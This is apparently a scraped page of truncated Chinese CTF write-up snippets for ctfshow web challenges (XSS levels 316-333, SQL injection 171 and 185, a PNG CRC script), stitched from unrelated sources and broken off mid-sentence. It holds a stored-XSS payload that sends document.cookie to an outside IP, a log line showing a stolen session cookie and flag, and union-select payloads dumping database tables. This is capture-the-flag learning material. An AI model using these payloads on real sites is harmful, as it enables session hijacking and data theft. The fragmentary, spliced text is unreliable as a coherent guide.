感觉是,姿势越骚,越不容易被过滤 看了一下,Y4爷的博客, 324过滤; 325过滤.,?但是没有感觉喃? web 327 存储型xss;发送者和接受者都用的admin,剩余的随便,内容是: 拿到了flag,但是怎么就拿到了呢??? 看了视频,大师傅说的是,发送者是admin就行了 web 328 在本地,不知道为啥nc拿不到数据了,所以采用...
1. 感觉是,姿势越骚,越不容易被过滤 看了一下,Y4爷的博客, 324过滤; 325过滤.,?但是没有感觉喃? web 327 存储型xss;发送者和接受者都用的admin,剩余的随便,内容是: 拿到了flag,但是怎么就拿到了呢??? 看了视频,大师傅说的是,发送者是admin就行了 web 328 在本地,不知道为啥nc拿不到数据了,所以...
前面那个String.fromCharCode生产payload web327 web328 web329 web320 web331 web322-323 参考链接 前言 以下需要师父们自己url解码哦,然后大部分使用了xss平台盲打连接最下方也有,过滤空格...
web316 web317 web318 web319 web320 web321 web322 web323 web324 web325 web326 web327 web328-1 web328-2 web329-1 web329-2 web329-3 web330 web331 web332 web333-1 web333-2相关推荐 评论26 1.3万 113 3:17:45 CTFshow-web入门-命令执行 1.5万 128 28:37:32 【CTF全套120集】清华...
web327 形式变成了这种 收件人是admin,发件人和信的内容填写xss payload即可 web328-js拿管理员cookie 用户管理界面需要管理员权限,需要盗取管理员cookie 方法一:加载js 在自己的服务器上放一个php文件和一个js文件 php-接受js传来的cookie并保存 <?php ...
web171首先尝试1'--+,发现有返回值;说明直接闭合正确;接着找用来输出的列:1' order by 3--+,发现一共有3行(就1,2,3,4,5慢慢试出来)查看数据库:1' union select 1,2,database()--+得到数据库名为ctfshow_web爆破表名:-1' union select 1,2,group_concat(table_name) FROM information_schema....
web327 这里变为存储型的XSS了! 收件人为admin,其它随便写,payload还用上面的那个脚本! 当然使用xss平台也是可以的! 49.235.148.38 - - [19/May/2021:20:32:09 +0800] "GET //cookie.php?cookie=PHPSESSID=l0vjstgl7h6711i2874s46goeq;%20flag=ctfshow%7B11633866-d8c7-406c-80ab-cd23de6e4184%7D HTT...
web 185 这个是web184,然后将数字改成true相加即可 还是会遇到一些很奇怪的问题;例如,跑代码时上传的talbeName能用,但是到网页端提交就不管用;又例如,flag开头应该是ctfshow,但是跑代码跑出来却是111ihw,实在有点不知道为什么。 这里贴一个代码,依旧是看着Y4大佬的代码改的,这里也将tableName的值输出来了,不过改...
Web327 收件人是admin Web328 注册一个用户并登录,发现里面有用户名和密码,但是只有管理员能看到: 那么接下来的想法就是设置密码为XSS Payload,这样管理员打开页面时会进行攻击。只需要注册一个密码为XSS Payload的用户即可。 document.location.href='http://121.4.112.210/ctfshow/test.php?cookie='+document....
用tweakpng打开文件 通过python2脚本来获取图片高度 # -*- coding: utf-8 -*- import binascii import struct #\x49\x48\x44\x52\x00\x00\x01\xF4\x00\x00\x01\xA4\x08\x06\x00\x00\x00 crc32key = 0xCBD6DF8A for i in range(0, 65535): ...